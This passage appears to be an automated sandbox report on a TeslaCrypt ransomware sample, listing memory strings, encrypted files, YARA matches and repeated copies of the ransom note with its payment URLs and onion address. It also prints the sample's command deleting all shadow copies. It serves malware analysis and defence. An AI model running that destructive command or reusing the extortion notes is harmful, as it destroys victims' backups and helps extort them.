for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt281.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: C:\Users\user\AppData\Roaming\svcmtr.exe Process created: C:\Windows\System32\vssadmin.exe "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
Source: 0t8amSU3vd.exe Binary or memory string: RESTORE_FILES.TXT
Source: 0t8amSU3vd.exe Binary or memory string: RESTORE_FILES.HTML
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: RESTORE_FILES.TXTopen\RESTORE_FILES.HTML
Source: 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: RESTORE_FILES.TXTopen\RESTORE_FILES.HTML
Source: svcmtr.exe Binary or memory string: RESTORE_FILES.TXT
Source: svcmtr.exe Binary or memory string: RESTORE_FILES.HTML
Source: svcmtr.exe, 00000002.00000003.406909089.0000000000708000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: restore_files_gpmus.html
Source: svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: RESTORE_FILES.TXTopen\RESTORE_FILES.HTML
Source: svcmtr.exe, 00000002.00000003.516398200.00000000006ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: restore_files_gpmus.html
Source: svcmtr.exe, 00000002.00000003.755279810.0000000000709000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: restore_files_gpmus.html
Source: svcmtr.exe, 00000002.00000002.876106236.0000000002D87000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File moved: C:\Users\user\Desktop\FENIVHOIKN.docx
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File moved: C:\Users\user\Desktop\CURQNKVOIX.xlsx
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File moved: C:\Users\user\Desktop\RAYHIWGKDI\CURQNKVOIX.xlsx
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File moved: C:\Users\user\Desktop\FENIVHOIKN.pdf
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File moved: C:\Users\user\Desktop\CURQNKVOIX\SUAVTZKNFL.png
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File moved: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File moved: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File moved: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File moved: C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File moved: C:\Users\user\AppData\Local\Microsoft\Windows\Burn\Burn\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File moved: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File moved: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File moved: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File moved: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File moved: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\aa2de5f4-12f7-4e24-86b2-9ea3afd5e638\restore_files_gpmus.html -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server!!!.</font><br><br><b><font class="ttl">what do i do?</b></font> <br><font style="font-size:13px;">alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> if you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b" target="_blank">http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b" target="_blank">http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b</a></b><br><
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\aa2de5f4-12f7-4e24-86b2-9ea3afd5e638\restore_files_gpmus.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.if you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1.http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b2.http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b3. https://zpr5huq4bgmutfnf.onion.to/e722d94c1cac34bif for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the address bar: zpr5huq4bgmutfnf.onion
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\35\restore_files_gpmus.html -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server!!!.</font><br><br><b><font class="ttl">what do i do?</b></font> <br><font style="font-size:13px;">alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> if you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b" target="_blank">http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b" target="_blank">http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b</a></b><br><
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\35\restore_files_gpmus.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.if you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1.http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b2.http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b3. https://zpr5huq4bgmutfnf.onion.to/e722d94c1cac34bif for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the address bar: zpr5huq4bgmutfnf.onion
Source: C:\Users\user\AppData\Roaming\svcmtr.exe File dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\35\9.47.0\restore_files_gpmus.html -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server!!!.</font><br><br><b><font class="ttl">what do i do?</b></font> <br><font style="font-size:13px;">alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> if you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b" target="_blank">http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b" target="_blank">http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b</a></b><br><
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\restore_files_gpmus.html -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server!!!.</font><br><br><b><font class="ttl">what do i do?</b></font> <br><font style="font-size:13px;">alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> if you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b" target="_blank">http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b" target="_blank">http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b</a></b><br><Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\restore_files_gpmus.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.if you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1.http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b2.http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b3. https://zpr5huq4bgmutfnf.onion.to/e722d94c1cac34bif for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the address bar: zpr5huq4bgmutfnf.onionJump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gdaefkejpgkiemlaofpalmlakkmbjdnl\restore_files_gpmus.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.if you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1.http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b2.http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b3. https://zpr5huq4bgmutfnf.onion.to/e722d94c1cac34bif for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the address bar: zpr5huq4bgmutfnf.onionJump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile dropped: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1001\restore_files_gpmus.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.if you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1.http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b2.http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b3. https://zpr5huq4bgmutfnf.onion.to/e722d94c1cac34bif for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the address bar: zpr5huq4bgmutfnf.onionJump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\restore_files_gpmus.html -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server!!!.</font><br><br><b><font class="ttl">what do i do?</b></font> <br><font style="font-size:13px;">alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> if you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b" target="_blank">http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b" target="_blank">http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b</a></b><br><Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG.aaa (copy) entropy: 7.99346154842Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG.aaa (copy) entropy: 7.99398845138Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG.aaa (copy) entropy: 7.99457692256Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG.aaa (copy) entropy: 7.9960715748Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG.aaa (copy) entropy: 7.99615524232Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG.aaa (copy) entropy: 7.99335614851Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG.aaa (copy) entropy: 7.99304092425Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG.aaa (copy) entropy: 7.99584705514Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG.aaa (copy) entropy: 7.99583914772Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG.aaa (copy) entropy: 7.99637860205Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG.aaa (copy) entropy: 7.99141931749Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG.aaa (copy) entropy: 7.99187987277Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME01.CSS.aaa (copy) entropy: 7.99846981057Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME02.CSS.aaa (copy) entropy: 7.99816803998Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME03.CSS.aaa (copy) entropy: 7.99854133731Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME04.CSS.aaa (copy) entropy: 7.99834570599Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME05.CSS.aaa (copy) entropy: 7.99862577944Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME06.CSS.aaa (copy) entropy: 7.99849409282Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME07.CSS.aaa (copy) entropy: 7.99853735073Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME08.CSS.aaa (copy) entropy: 7.99830826167Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME09.CSS.aaa (copy) entropy: 7.99853367769Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME10.CSS.aaa (copy) entropy: 7.99878340885Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME11.CSS.aaa (copy) entropy: 7.99874519912Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME12.CSS.aaa (copy) entropy: 7.99844522652Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME13.CSS.aaa (copy) entropy: 7.99856499915Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME14.CSS.aaa (copy) entropy: 7.99837423835Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME15.CSS.aaa (copy) entropy: 7.99816329199Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME16.CSS.aaa (copy) entropy: 7.99859076703Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME17.CSS.aaa (copy) entropy: 7.99817283998Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME18.CSS.aaa (copy) entropy: 7.99872843695Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME19.CSS.aaa (copy) entropy: 7.99853816402Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME20.CSS.aaa (copy) entropy: 7.99850966224Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME21.CSS.aaa (copy) entropy: 7.99834186383Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME22.CSS.aaa (copy) entropy: 7.99865503926Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME23.CSS.aaa (copy) entropy: 7.99859273255Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME24.CSS.aaa (copy) entropy: 7.99852672413Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME25.CSS.aaa (copy) entropy: 7.99857252149Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME26.CSS.aaa (copy) entropy: 7.99833876446Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME27.CSS.aaa (copy) entropy: 7.99825322135Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME28.CSS.aaa (copy) entropy: 7.99852619771Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME29.CSS.aaa (copy) entropy: 7.99866799757Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME30.CSS.aaa (copy) entropy: 7.99849458796Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME31.CSS.aaa (copy) entropy: 7.99827898335Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME32.CSS.aaa (copy) entropy: 7.99831007926Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME33.CSS.aaa (copy) entropy: 7.99851675108Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME34.CSS.aaa (copy) entropy: 7.99830785461Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME35.CSS.aaa (copy) entropy: 7.99871655061Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME36.CSS.aaa (copy) entropy: 7.99854234655Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME37.CSS.aaa (copy) entropy: 7.99864581495Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME38.CSS.aaa (copy) entropy: 7.99869433103Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME39.CSS.aaa (copy) entropy: 7.99836415506Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME40.CSS.aaa (copy) entropy: 7.99825910238Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME41.CSS.aaa (copy) entropy: 7.99858776273Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME42.CSS.aaa (copy) entropy: 7.99827717241Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME43.CSS.aaa (copy) entropy: 7.99847625719Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME44.CSS.aaa (copy) entropy: 7.99878808928Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME45.CSS.aaa (copy) entropy: 7.99844741889Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME46.CSS.aaa (copy) entropy: 7.99841106271Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME47.CSS.aaa (copy) entropy: 7.99857325215Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME48.CSS.aaa (copy) entropy: 7.99835890105Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME49.CSS.aaa (copy) entropy: 7.99828105473Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME50.CSS.aaa (copy) entropy: 7.99853735855Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME51.CSS.aaa (copy) entropy: 7.99847590861Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME52.CSS.aaa (copy) entropy: 7.99852420294Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME53.CSS.aaa (copy) entropy: 7.99841576897Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME54.CSS.aaa (copy) entropy: 7.998399262Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME55.CSS.aaa (copy) entropy: 7.9984901335Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS.aaa (copy) entropy: 7.99840356829Jump to dropped file

System Summary

Source: 2.2.svcmtr.exe.240000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 12.2.svcmtr.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 13.2.svcmtr.exe.240000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 2.2.svcmtr.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 12.2.svcmtr.exe.2c0000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 11.2.svcmtr.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 11.2.svcmtr.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 13.2.svcmtr.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 11.2.svcmtr.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 0.2.0t8amSU3vd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 12.2.svcmtr.exe.2c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
Source: 0.2.0t8amSU3vd.exe.520000.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Teslacrypt Author: ReversingLabs
